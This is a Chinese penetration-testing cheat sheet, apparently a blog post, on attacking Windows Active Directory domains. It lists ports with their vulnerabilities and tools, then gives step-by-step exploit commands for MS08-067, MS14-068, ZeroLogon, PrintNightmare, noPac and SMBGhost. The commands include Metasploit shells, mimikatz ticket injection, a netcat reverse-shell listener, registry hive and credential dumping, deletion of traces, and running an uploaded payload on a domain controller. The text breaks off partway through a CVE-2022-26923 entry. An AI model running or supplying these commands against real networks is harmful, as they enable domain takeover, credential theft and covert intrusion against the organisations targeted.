- \n
- \u6f0f\u6d1e\uff1aDNS \u7f13\u5b58\u4e2d\u6bd2\u3001DNS \u653e\u5927<\/li>\n\n\n\n
- \u5de5\u5177\uff1a
nslookup<\/code>\uff0cdig<\/code>\uff0cdnsenum<\/code>\uff0cFierce<\/code>\uff0cdnsrecon<\/code>\uff0cdnstracer<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<\/p>\n\n\n\n
- \n
- \u7aef\u53e3 88 (Kerberos)\n
- \n
- \u6f0f\u6d1e\uff1aAS-REP \u70e4\u5236\u3001\u7968\u8bc1\u4f2a\u9020\u3001\u4f20\u9012\u7968\u8bc1\u3001\u94f6\u7968\u653b\u51fb\u3001\u91d1\u7968\u653b\u51fb<\/li>\n\n\n\n
- \u5de5\u5177\uff1aimpacket\u3001Rubeus\u3001Kerbrute\u3001Hashcat\u3001GetUserSPN\u3001mitm6<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
<\/p>\n\n\n\n
- \n
- \u7aef\u53e3 135 (MS-RPC)\n
- \n
- \u6f0f\u6d1e\uff1aDCOM \u5229\u7528\u3001MS-RPC \u6743\u9650\u63d0\u5347<\/li>\n\n\n\n
- \u5de5\u5177\uff1arpcclient\u3001Metasploit\u3001NMap\u3001PowerSploit\u3001NetExec\uff08CrackMapExec\uff09\u3001Evil-WinRM<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
<\/p>\n\n\n\n
- \n
- \u7aef\u53e3 137-139 (NetBIOS)\n
- \n
- \u6f0f\u6d1e\uff1aSMB \u4e2d\u7ee7\u3001NTLM \u4e2d\u7ee7\u3001NetBIOS \u6b3a\u9a97<\/li>\n\n\n\n
- \u5de5\u5177\uff1asmbclient\u3001Responder\u3001impacket\u3001NMap\u3001NetExec\uff08CrackMapExec\uff09<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
<\/p>\n\n\n\n
- \n
- \u7aef\u53e3 389 (LDAP)\n
- \n
- \u6f0f\u6d1e\uff1aLDAP \u6ce8\u5165\u3001\u51ed\u8bc1\u7a83\u53d6\u3001\u533f\u540d\u7ed1\u5b9a<\/li>\n\n\n\n
- \u5de5\u5177\uff1aldapsearch\u3001NMap\u3001ldapdomaindump\u3001NetExec\uff08CrackMapExec\uff09\u3001BloodHound\u3001ADExplorer<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
<\/p>\n\n\n\n
- \n
- \u7aef\u53e3 445 (SMB)\n
- \n
- \u6f0f\u6d1e\uff1aEternalBlue\u3001SMB \u4e2d\u7ee7\u3001SMB \u7b7e\u540d\u5df2\u7981\u7528\u3001\u4f20\u9012\u54c8\u5e0c<\/li>\n\n\n\n
- \u5de5\u5177\uff1asmbclient\u3001impacket\u3001NMap\u3001NetExec\uff08CrackMapExec\uff09\u3001Metasploit\u3001smbmap<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
<\/p>\n\n\n\n
- \n
- \u7aef\u53e3 464\uff08Kerberos \u5bc6\u7801\u66f4\u6539\uff09\n
- \n
- \u6f0f\u6d1e\uff1aKerberoasting\u3001\u5bc6\u7801\u55b7\u6d12<\/li>\n\n\n\n
- \u5de5\u5177\uff1aimpacket\u3001Rubeus\u3001Kerbrute\u3001Hashcat\u3001KrbRelayUp\u3001ASREPRoast.py<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
<\/p>\n\n\n\n
- \n
- \u7aef\u53e3 593 (HTTP RPC)\n
- \n
- \u6f0f\u6d1e\uff1a\u8eab\u4efd\u9a8c\u8bc1\u7ed5\u8fc7\u3001MS-RPC \u6ce8\u5165<\/li>\n\n\n\n
- \u5de5\u5177\uff1arpcclient\u3001Metasploit\u3001NMap\u3001PowerSploit\u3001Evil-WinRM\u3001NetExec\uff08CrackMapExec\uff09<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
<\/p>\n\n\n\n
- \n
- \u7aef\u53e3 636 (LDAPS)\n
- \n
- \u6f0f\u6d1e\uff1aLDAP \u6ce8\u5165\u3001\u8bc1\u4e66\u6b3a\u9a97<\/li>\n\n\n\n
- \u5de5\u5177\uff1aldapsearch\u3001NMap\u3001NetExec\uff08CrackMapExec\uff09\u3001BloodHound\u3001ADExplorer<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
<\/p>\n\n\n\n
- \n
- \u7aef\u53e3 3268-3269\uff08\u5168\u5c40\u76ee\u5f55\uff09\n
- \n
- \u6f0f\u6d1e\uff1aLDAP \u6ce8\u5165\u3001\u6570\u636e\u6cc4\u9732<\/li>\n\n\n\n
- \u5de5\u5177\uff1aldapsearch\u3001NMap\u3001NetExec\uff08CrackMapExec\uff09\u3001BloodHound\u3001ADExplorer<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
<\/p>\n\n\n\n
- \n
- \u7aef\u53e3 3389 (RDP)\n
- \n
- \u6f0f\u6d1e\uff1aBlueKeep\u3001\u5f31\u52a0\u5bc6\u3001RDP \u52ab\u6301\u3001\u51ed\u8bc1\u8f6c\u53d1<\/li>\n\n\n\n
- \u5de5\u5177\uff1ancrack\u3001xfreerdp\u3001Metasploit\u3001NetExec\uff08CrackMapExec\uff09\u3001rdpscan<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
<\/p>\n\n\n\n
AD\u57df\u4e2d\u5e38\u7528\u624b\u6cd5\u5982\u4e0b\uff0c\u4e3b\u8981\u601d\u8def\u4e3a\uff1a<\/p>\n\n\n\n
\u4fe1\u606f\u6536\u96c6\uff0c\u770b\u8d26\u53f7\u6743\u9650\uff0c\u6709\u4ec0\u4e48\u670d\u52a1\uff0c\u6709\u6ca1\u6709\u914d\u7f6e\u4ec0\u4e48\u7279\u6b8a\u6743\u9650<\/p>\n\n\n\n
\u7136\u540e\u6839\u636e\u60c5\u51b5\u7528\u5de5\u5177\u68c0\u6d4b\u4e00\u904d\u6f0f\u6d1e\uff0c\u68c0\u6d4b\u5230\u54ea\u4e2a\u7528\u54ea\u4e2a<\/p>\n\n\n\n
![\"\"](\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/10\/f3d9d45e9aa912b522b3bb0e445c1f9.png\")
<\/figure>\n\n\n\n<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u5e38\u7528\u6f0f\u6d1e\uff1a<\/h1>\n\n\n\n
\uff08\u5efa\u8bae\u628a\u4e0b\u9762\u6240\u6709\u6f0f\u6d1e\u68c0\u6d4b\u548c\u5229\u7528\u5de5\u5177\u90fd\u6536\u96c6\u8d77\u6765\uff0c\u6e17\u900f\u7684\u65f6\u5019\u8dd1\u4e00\u904d\uff09<\/p>\n\n\n\n
<\/p>\n\n\n\n
MS08-067<\/h2>\n\n\n\n
RPC\u8fdc\u7a0b\u7f13\u51b2\u533a\u6ea2\u51fa\u5bfc\u81f4\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e<\/strong><\/p>\n\n\n\n
\u9002\u7528\uff1aWindows 2000;XP;Server 2003;Vista;Server 2008;7 Beta<\/p>\n\n\n\n
msf\u6a21\u5757\uff1a<\/p>\n\n\n\n
use exploit\/windows\/smb\/ms08_067_netapi #\u4f7f\u7528\u6a21\u5757\nset rhosts 10.10.10.10 #\u8bbe\u7f6e\u9776\u673a\nset lhost 172.18.124.49 \nset payload generic\/shell_bind_tcp #\u8bbe\u7f6epayload\nexploit<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
<\/p>\n\n\n\n
MS14-025<\/h2>\n\n\n\n
GPP<\/p>\n\n\n\n
\u9002\u7528\uff1a2003\u30012008\u30012012\uff082012\u4ee5\u4e0a\u5df2\u4fee\u590d\uff09<\/p>\n\n\n\n
\u6bcf\u5f53\u521b\u5efa\u65b0\u7684\u7ec4\u7b56\u7565\u9996\u9009\u9879 (GPP) \u65f6\uff0c\u90fd\u4f1a\u5728 SYSVOL \u5171\u4eab\u4e2d\u521b\u5efa\u4e00\u4e2a\u5e26\u6709\u8be5\u914d\u7f6e\u6570\u636e\u7684 xml \u6587\u4ef6\uff0c\u5305\u62ec\u4e0e GPP \u5173\u8054\u7684\u4efb\u4f55\u5bc6\u7801\u3002\u4e3a\u5b89\u5168\u8d77\u89c1\uff0cMicrosoft\u5c06\u5bc6\u7801\u5b58\u50a8\u4e3acpassword<\/code>. \u4f46\u968f\u540e\u5fae\u8f6f\u5728 MSDN \u4e0a\u516c\u5e03\u4e86\u5bc6\u94a5\u3002<\/p>\n\n\n\n\u5fae\u8f6f\u5728 2014 \u5e74\u53d1\u5e03\u4e86\u4e00\u4e2a\u8865\u4e01\uff0c\u963b\u6b62\u7ba1\u7406\u5458\u5c06\u5bc6\u7801\u8f93\u5165 GPP\u3002\u4f46\u662f\u8be5\u8865\u4e01\u5bf9\u5df2\u7ecf\u5b58\u5728\u7684\u8fd9\u4e9b\u6613\u7834\u89e3\u5bc6\u7801\u6ca1\u6709\u4efb\u4f55\u4f5c\u7528\u3002<\/p>\n\n\n\n
<\/p>\n\n\n\n
MS14-068<\/h2>\n\n\n\n
\u57df\u7528\u6237\u63d0\u6743\u5230\u57df\u7ba1\u6f0f\u6d1e<\/p>\n\n\n\n
\u5229\u7528\u65b9\u6cd5\uff1a\u9700\u8981\u6f0f\u6d1e\u5b58\u5728\uff0c\u4e14\u77e5\u9053\u8be5\u57df\u7528\u6237<\/strong>\u7684SID\uff0c\u8d26\u53f7\uff0c\u5bc6\u7801<\/strong><\/p>\n\n\n\n
PAC\u6821\u9a8c\u7f3a\u9677\uff0c\u5bfc\u81f4\u53ef\u4ee5\u4f2a\u9020PAC\uff0c\u5e76\u4e14KDC\u53ef\u4ee5\u6b63\u786e\u89e3\u6790\u653e\u5728TGT\u5916\uff08\u975e\u9884\u671f\u4f4d\u7f6e\uff09\u7684PAC\u3002\u4ee5\u4e0a\u4e24\u70b9\u5bfc\u81f4\u53ef\u4ee5\u4ece\u666e\u901a\u57df\u7528\u6237\u63d0\u5347\u5230\u57df\u7ba1\u6743\u9650\u3002<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u7528\u6cd5\uff1a<\/strong><\/p>\n\n\n\n
MS14-068.exe\u4e0b\u8f7d\u5730\u5740<\/p>\n\n\n\n
https:\/\/github.com\/abatchy17\/WindowsExploits\/tree\/master\/MS14-068<\/a><\/p>\n\n\n\n
PsExec64.exe\u4e0b\u8f7d\u5730\u5740<\/p>\n\n\n\n
https:\/\/github.com\/crupper\/Forensics-Tool-Wiki\/blob\/master\/windowsTools\/PsExec64.exe<\/a><\/p>\n\n\n\n
\u5c06\u5185\u5b58\u4e2d\u5df2\u6709\u7684kerberos\u7968\u636e\u6e05\u9664,\u6e05\u9664\u65b9\u6cd5\u4f7f\u7528mimikatz<\/p>\n\n\n\n
\u83b7\u53d6\u8c03\u8bd5\u6743\u9650\uff08\u5fc5\u987b\u662f\u7ba1\u7406\u5458\u6743\u9650\u624d\u80fd\u6293\uff09\nprivilege::debug\n\n\u67e5\u770b\u5f53\u524dkerberos\u7968\u636e\u5217\u8868\nkerberos::list\n\n\u6e05\u9664kerberos\u7968\u636e\nkerberos::purge<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
whoami\/all\u67e5\u770b\u672c\u673a\u8be6\u7ec6\u4fe1\u606f\uff08\u4e3b\u8981\u662f\u770bSID\uff0c\u6293hash\u67e5\u770b\u4e5f\u884c\uff09\nsekurlsa::logonpasswords\n\nS-1-5-21-979886063-1111900045-1414766810-1103<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/10\/image-28.png\")
<\/figure>\n\n\n\n\u5229\u7528ms14-068.exe\u63d0\u6743\u5de5\u5177\u751f\u6210\u4f2a\u9020\u7684kerberos\u534f\u8bae\u8ba4\u8bc1\u8bc1\u4e66<\/p>\n\n\n\n
MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>\n\nMS14-068.exe -u <\u57df\u7528\u6237\u540d>@<\u57df\u540d> -p <\u57df\u7528\u6237\u5bc6\u7801> -s <\u57df\u7528\u6237SID> -d <\u57df\u63a7IP>\n\nMS14-068.exe -u douser@DEMO.COM -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1103 -d 10.10.10.100<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/10\/image-39.png\")
<\/figure>\n\n\n\n\u5229\u7528mimikatz.exe\u5c06\u8bc1\u4e66\u5199\u5165\uff0c\u4ece\u800c\u63d0\u5347\u4e3a\u57df\u7ba1\u7406\u5458<\/p>\n\n\n\n
kerberos::ptc C:\\\u751f\u6210\u7684\u8bc1\u4e66\u7684\u4f4d\u7f6e\uff08\u4e00\u822c\u662fccache\u7ed3\u5c3e\uff09<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/10\/image-40.png\")
<\/figure>\n\n\n\n\u9a8c\u8bc1\u662f\u5426\u6210\u529f\u63d0\u6743\uff1a<\/p>\n\n\n\n
\u5217\u51fa\u57df\u63a7\u7684C\u76d8\u76ee\u5f55\uff0c\u5982\u679c\u6210\u529f\u8bbf\u95ee\u5219\u8bf4\u660e\u666e\u901a\u57df\u7528\u6237\u63d0\u6743\u6210\u529f\ndir \\\\\u57df\u63a7\u673a\u5668\u540d\\c$<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/10\/image-41.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/10\/image-42.png\")
<\/figure>\n\n\n\n\u4f7f\u7528PSTools\u76ee\u5f55\u4e0b\u7684PsExec.exe\u83b7\u53d6shell\uff0c#psexec.exe\u4ee5\u7ba1\u7406\u5458\u6743\u9650\u8fd0\u884c\u8fde\u63a5\u57df\u63a7<\/p>\n\n\n\n
PsExec.exe \\\\\u57df\u63a7\u673a\u5668\u540d cmd.exe<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/10\/image-43.png\")
<\/figure>\n\n\n\n\u7136\u540e\u5c31\u53ef\u4ee5\u901a\u8fc7\u547d\u4ee4\u4e0a\u4f20\u7801\u5b50\u4e86\ncopy c:\\\\1.exe \\\\\u57df\u63a7\u673a\u5668\u540d\\c$\\\n\u518d\u901a\u8fc7PsExec.exe\u8fd0\u884c<\/code><\/pre>\n\n\n\nMS17-010<\/h2>\n\n\n\n
\u6c38\u6052\u4e4b\u84dd\uff0c\u5b9e\u6218\u4e2d\uff0c\u975e\u7279\u6b8a\u60c5\u51b5\uff0c\u4e0d\u8981\u4f7f\u7528\uff0c\u84dd\u5c4f\u975e\u5e38\u9ebb\u70e6<\/p>\n\n\n\n
\u9002\u7528\uff1aWindowsNT\uff0cWindows2000\u3001Windows XP\u3001Windows 2003\u3001Windows Vista\u3001Windows 7\u3001Windows 8\uff0cWindows 2008\u3001Windows 2008 R2\u3001Windows Server 2012 SP0\u3002<\/p>\n\n\n\n
\u5de5\u5177\uff1aMSF<\/p>\n\n\n\n
<\/p>\n\n\n\n
CVE-2020-0796<\/h2>\n\n\n\n
https:\/\/github.com\/ZecOps\/CVE-2020-0796-RCE-POC<\/a><\/p>\n\n\n\n
SMB v3\u8fdc\u7a0b\u4ee3\u7801\u6267\u2f8f\u6f0f\u6d1e\u83b7\u53d6\u6743\u9650<\/p>\n\n\n\n
\u9002\u7528\uff1aWindows 10 1903-1909<\/p>\n\n\n\n
nc -lnvp <reverse_shell_port>\nSMBleedingGhost.py <target_ip> <reverse_shell_ip> <reverse_shell_port><\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
CVE-2020-1472<\/h2>\n\n\n\n
ZeroLogon<\/strong>\u57df\u7ba1\u5bc6\u7801\u7f6e\u7a7a\uff08\u767b\u5f55\u540e\u5fc5\u987b\u8fd8\u539f\uff0c\u957f\u65f6\u95f4\u4f1a\u8ba9\u57df\u63a7\u8131\u57df\uff09<\/p>\n\n\n\n
\u6761\u4ef6\uff1a\u9700\u8981\u6709\u4e00\u4e2a\u666e\u901a\u57df\u7528\u6237\u6743\u9650<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u539f\u7406\uff1a\u5fae\u8f6f\u5728\u8fdb\u884cAES\u52a0\u5bc6\u8fd0\u7b97\u8fc7\u7a0b\u4e2d\uff0c\u4f7f\u7528\u4e86AES-CFB8\u6a21\u5f0f\u5e76\u4e14\u9519\u8bef\u7684\u5c06IV\u8bbe\u7f6e\u4e3a\u5168\u96f6\uff0c\u8fd9\u4f7f\u5f97\u653b\u51fb\u8005\u5728\u660e\u6587(client challenge)\u3001IV\u7b49\u8981\u7d20\u53ef\u63a7\u7684\u60c5\u51b5\u4e0b\uff0c\u5b58\u5728\u8f83\u9ad8\u6982\u7387\u4f7f\u5f97\u4ea7\u751f\u7684\u5bc6\u6587\u4e3a\u5168\u96f6\uff081\/256\uff09\u3002\u901a\u8fc7\u78b0\u649e\u65b9\u6cd5\uff0c\u653b\u51fb\u8005\u4fbf\u5b8c\u6210\u4e86\u57df\u8eab\u4efd\u8ba4\u8bc1\uff0c\u4fee\u6539krbtgt\u7528\u6237\u5bc6\u7801\u4e3a\u7a7a\uff0c\u4ece\u800c\u8fdb\u884cDCsync\u3002\u8be6\u7ec6\u539f\u7406:zerologon \u7279\u6743\u63d0\u5347\u6f0f\u6d1e(CVE-2020-1472)\u539f\u7406\u5206\u6790\u4e0e\u9a8c\u8bc1\u3002<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u9002\u7528\uff1a
Windows Server 2008 R2
Windows Server 2012\u3001Windows Server 2012 R2
Windows Server 2016
Windows Server 2019\u3001version 1903\u30011909\u30012004<\/p>\n\n\n\n<\/p>\n\n\n\n
\u5de5\u5177\uff1ahttps:\/\/github.com\/mstxq17\/cve-2020-1472<\/p>\n\n\n\n
net group \"domain controllers\" \/domain #\u67e5\u8be2\u57df\u63a7\u4e3b\u673a\u540d\npython3 cve-2020-1472-poc.py test-ADMIN 10.10.10.100 #\u57df\u63a7\u4e3b\u673a\u540d \u57df\u63a7ip\npython3 cve-2020-1472-exploit.py test-ADMIN 10.10.10.100 #\u4f7f\u7528exploit\u5c06\u57df\u63a7\u673a\u5668\u8d26\u53f7\u91cd\u7f6e\npython3 secretsdump.py test.admin\/test-ADMIN$@10.10.10.100 -no-pass #\u56db\u4e2a\u7a7a\u683c\npython3 wmiexec.py -hashes aad3b435b51404abcd121312d3b435b51404ee:7c85312321qaacsde620b6e8c37905 test.admin\/Administrator@10.10.10.100\n#\u7136\u540e\u901a\u8fc7\u5bfc\u51fa sam system \u7b49\u6587\u4ef6\u5230\u672c\u5730\uff0c\u83b7\u53d6\u57df\u63a7\u673a\u5668\u4e0a\u672c\u5730\u4fdd\u5b58\u4e4b\u524d\u7684 hash \u503c\u7528\u4e8e\u6062\u590d\uff0c\u4e0d\u7136\u5c31\u8131\u57df\u4e86\uff1a\nreg save HKLM\\SYSTEM system.save\nreg save HKLM\\SAM sam.save\nreg save HKLM\\SECURITY security.save\nget system.save #\u4e0b\u8f7d\u5230\u6bd4\u672c\u5730\nget sam.save\nget security.save \ndel \/f system.save #\u6e05\u7406\u75d5\u8ff9\ndel \/f sam.save #\u6e05\u7406\u75d5\u8ff9\ndel \/f security.save #\u6e05\u7406\u75d5\u8ff9\n\n#\u901a\u8fc7 sam.save\u3001security.save\u3001system.save \u8fd9\u4e9b\u6587\u4ef6\u83b7\u5f97\u539f\u6765\u57df\u63a7\u673a\u5668\u4e0a\u7684 Ntlm Hash \u503c\uff0c\u7528\u4e8e\u6062\u590d\u5bc6\u7801\uff1a\npython3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL #\u63d0\u53d6\u539f\u5bc6\u7801HASH\n#\u901a\u8fc7\u62ff\u5230 $MACHINE.ACC: \u7684\u503c\uff0c\u7136\u540e\u8fdb\u884c\u6062\u590d\uff1a\u6ce8\u610f\u9700\u8981\u540e\u534a\u90e8\u5206\uff1a\n$MACHINE.ACC: \u7684\u503c$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:ce7b34c0f2c72d6cb03123ef5ff741ca\npython3 reinstall_original_pw.py test-ADMIN 192.168.159.149 ce7b34c0f2c72d6cb03123ef5ff741ca\n#\u4f7f\u7528\u811a\u672c\u6765\u68c0\u6d4b\u662f\u5426\u6062\u590d\u5bc6\u7801\u6210\u529f\uff1a\npython3 secretsdump.py test.admin\/test-ADMIN$@192.168.159.149 -just-dc -no-pass\n#\u6216\u8005\u8fd8\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\uff1a\u6ce8\u610f\u56db\u4e2a\u7a7a\u683c\npython3 secretsdump.py test.admin\/test-ADMIN$@192.168.159.149 -no-pass\n#\u81f3\u6b64\u6574\u4e2a\u653b\u51fb\u5df2\u7ecf\u5b8c\u6210<\/code><\/pre>\n\n\n\n#mimikatz zerologon\u57df\uff1ahacker.testlab\nprivilge::debug #\u6743\u9650\u63d0\u5347\nlsadump::zerologon \/target:dc.hacker.testlab \/account:dc$ #\u8fd9\u4e2a\u662fpoc\nlsadump::zerologon \/target:dc.hacker.testlab \/account:dc$ \/exploit #\u8fd9\u4e2a\u662fexp\nlsadump::dcsync \/domain:HACKER.LOCAL \/dc:dc.hacker.testlab \/user:krbtgt \/authuser:dc$ \/authdomain:HACKER \/authpassword:\"\" \/authntlm #\u518d\u6b21\u7a7a\u5bc6\u7801\u5c1d\u8bd5\nlsadump::postzerologon \/target:10.10.10.100 \/account:dc$ #\u6062\u590d\u5bc6\u7801<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
CVE-2021-1675<\/h2>\n\n\n\n
PrintNightmare<\/strong><\/p>\n\n\n\n
\u5229\u2f64CVE-2021-1675 \u6253\u5370\u673a\u670d\u52a1\u6f0f\u6d1e\u52a0\u8f7dDLL\u6267\u2f8f\u4ee3\u7801\u3002\u5f71\u54cd2008-2019\u3002\u9700\u8981\u57df\u5185\u51ed\u8bc1\uff0c\u5b9e\u6d4b2016\u548c2019\u53ef\u5229\u2f64\u6210\u529f\u4f7f\u2f64impacket rpcdump.py\u811a\u672c\u68c0\u6d4bprint spooler\u670d\u52a1<\/code>
\u9002\u7528\uff1awindows10\uff0816-21\uff09 windows server \uff0808-19\uff09<\/pre>\n\n\n\n<\/p>\n\n\n\n
\u4f5c\u7528\uff1a\u63d0\u6743<\/strong>\u4f7f\u7528rpcdump.py\u626b\u63cf\u6f5c\u5728\u7684\u6613\u53d7\u653b\u51fb\u7684\u4e3b\u673a\uff0c\u5982\u679c\u5b83\u8fd4\u56de\u4e0b\u9762\u5176\u4e2d\u7684\u4e00\u4e2a\u503c\uff0c\u5219\u5b83\u53ef\u80fd\u662f\u6613\u53d7\u653b\u51fb\u7684\u3002<\/p>\n\n\n\n
<\/p>\n\n\n\n
pcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'\n\nProtocol: [MS-PAR]: Print System Asynchronous Remote Protocol \nProtocol: [MS-RPRN]: Print System Remote Protocol<\/code><\/pre>\n\n\n\n.\/CVE-2021-1675.py hackit.local\/domain_user:Admin123@10.10.10.100 '\\\\10.10.10.10\\smb\\addCube.dll'\n.\/CVE-2021-1675.py hackit.local\/domain_user:Admin123@10.10.10.100 'C:\\addCube.dll'<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
<\/p>\n\n\n\n
CVE-2021-42287&&CVE-2021-42278<\/p>\n\n\n\n
NOpac<\/strong><\/p>\n\n\n\n
\u9002\u7528\uff1awindows 2008-2022
\u539f\u7406\uff1aCVE-2021-42278\u662f\u4e00\u4e2a\u5b89\u5168\u7ed5\u8fc7\u6f0f\u6d1e\uff0c\u5141\u8bb8\u901a\u8fc7\u4fee\u6539\u673a\u5668\u8d26\u6237\u7684 SAMAccountName\u5c5e\u6027\u6765\u5192\u5145\u57df\u63a7\u5236\u5668\u3002\u4e0e\u6807\u51c6\u7528\u6237\u8d26\u6237\u76f8\u6bd4\uff0c\u673a\u5668\u8d26\u6237\u7684\u540d\u79f0\u672b\u5c3e\u9644\u52a0\u4e86\u201c$\u201d\u7b26\u53f7\uff0c\u4f46\u5b9e\u9645\u4e2d\uff0cAD \u5e76\u6ca1\u6709\u9a8c\u8bc1\u57df\u5185\u673a\u5668\u8d26\u6237\u4e2d\u662f\u5426\u5177\u6709\u201c$”\uff0c\u5bfc\u81f4\u673a\u5668\u8d26\u6237\u53ef\u4ee5\u88ab\u5047\u5192\u3002<\/p>\n\n\n\n<\/p>\n\n\n\n
CVE-2021-42287\u662f\u5f71\u54cdKerberos\u7279\u6743\u5c5e\u6027\u8bc1\u4e66 (PAC)\u7684\u5b89\u5168\u7ed5\u8fc7\u6f0f\u6d1e\uff0c\u5141\u8bb8\u901a\u8fc7\u5047\u5192\u57df\u63a7\u5236\u5668\uff0c\u4f7f\u5bc6\u94a5\u5206\u53d1\u4e2d\u5fc3(KDC)\u521b\u5efa\u9ad8\u6743\u9650\u7968\u636e\u3002
\u6839\u636e\u8ba4\u8bc1Kerberos \u534f\u8bae\uff0c\u5728\u8bf7\u6c42\u670d\u52a1\u7968\u8bc1\u524d\u9700\u8981\u5148\u7b7e\u53d1TGT\uff08\u7968\u636e\u6388\u6743\u51ed\u8bc1)\u3002\u4f46\u662f\uff0c\u5f53\u4e3a\u6d3b\u52a8\u76ee\u5f55\u4e2d\u4e0d\u5b58\u5728\u7684\u8d26\u6237\u8bf7\u6c42\u670d\u52a1\u7968\u8bc1\u65f6\uff0c\u5bc6\u94a5\u5206\u53d1\u4e2d\u5fc3(KDC)\u5c06\u5728\u8be5\u8d26\u6237\u540d\u4e0a\u9644\u52a0\u201c$\u201d\u7b26\u53f7\u8fdb\u884c\u641c\u7d22\u3002\u5c06\u8fd9\u4e00\u884c\u4e3a\u4e0eCVE-2021-42278\u7ed3\u5408\uff0c\u6d4b\u8bd5\u4eba\u5458\u53ef\u4ee5\u5b9e\u73b0\u57df\u5185\u6743\u9650\u63d0\u5347\u3002<\/strong><\/p>\n\n\n\n<\/p>\n\n\n\n
python3 sam_the_admin.py hack.com\/test:Aa123456 -dc-ip 192.168.11.250 -debug\npython3 sam_the_admin.py hack.com\/test:Aa123456 -dc-ip 192.168.11.250 -dump -debug #dcsync\npython3 sam_the_admin.py hack.com\/test:Aa123456 -dc-ip 192.168.11.250 -shell -debug\n\nhttps://github.com\/WazeHell\/sam-the-admin\nhttps:\/\/github.com\/Ridter\/noPac\nhttps:\/\/github.com\/cube0x0\/noPac\n#https:\/\/github.com\/cube0x0\/noPac\n#\u68c0\u6d4b\u6f0f\u6d1e\nnoPac.exe scan -domain qaq.org -user admin -pass 'Aa123456'\n#\u5229\u7528\u6f0f\u8bf7\u6c42\u57df\u7ba1\u7528\u6237 cifs\u670d\u52a1ST,\u7528\u4e8e\u8bbf\u95ee\u5171\u4eab\nnoPac.exe -domain qaq.org -user admin -pass 'Aa123456' \/dc test5-2012.qaq.org \/mAccount saulgoodman \/mPassword passW0rd \/service cifs \/ptt\n#\u5229\u7528\u6f0f\u6d1e\u8bf7\u6c42\u57df\u7ba1\u7528\u6237 ldap\u670d\u52a1ST,\u7528\u4e8edcsync\nnoPac.exe -domain qaq.org -user admin -pass 'Aa123456' \/dc test5-2012.qaq.org \/mAccount saulgoodman \/mPassword passW0rd \/service ldap \/ptt\n#\u5229\u7528\u6f0f\u6d1e\u8bf7\u6c42\u57df\u7ba1\u7528\u6237HOST\/RPCSS\u670d\u52a1ST\uff0c\u7528\u4e8e\u6267\u884c\u547d\u4ee4\u3002\u53ef\u8fdc\u7a0b\u5229\u7528\nnoPac.exe -domain qaq.org -user admin -pass 'Aa123456' \/dc test5-2012.qaq.org \/mAccount saulgoodman \/mPassword passW0rd \/service HOST \/ptt\nnoPac.exe -domain qaq.org -user admin -pass 'Aa123456' \/dc test5-2012.qaq.org \/mAccount saulgoodman \/mPassword passW0rd \/service RPCSS \/ptt\n#\u8fdc\u7a0b\u5229\u7528\u5bfc\u51fa\u6ce8\u5165LDAP dcsync\uff0c\u5148\u7528MIMIkatz\u5bfc\u51fa\u7968\u636e\npython ticket_converter.py ticket.kirbi ticket.ccache #kirbi\u8f6c\u6362\u4e3aimpacket ccache\u7968\u636e\u683c\u5f0f\nexport KRB5CCNAME=ticket.ccache\npython secretsdump.py -k -no-pass test5-2012.qaq.org -just-dc<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
CVE-2022-26923<\/p>\n\n\n\n
ADCS<\/strong><\/p>\n\n\n\n
\u5f71\u54cd\u8303\u56f4\uff1a<\/strong>windows 2008-2022\u3002<\/p>\n\n\n\n
Windows Server 2012 R2 \nWindows RT 8.1 \nWindows 8.1 \nWindows Server 2016 \nWindows 10 \nWindows 10 Version 21H2 \nWindows 11 \nWindows Server, version 20H2\nWindows 10 Version 20H2 \nWindows Server 2022 \nWindows 10 Version 21H1 \nWindows 10 Version 1909 \nWindows Server 2019 \nWindows 10 Version 1809<\/code><\/pre>\n\n\n\n\u539f\u56e0\uff1a<\/p>\n\n\n\n
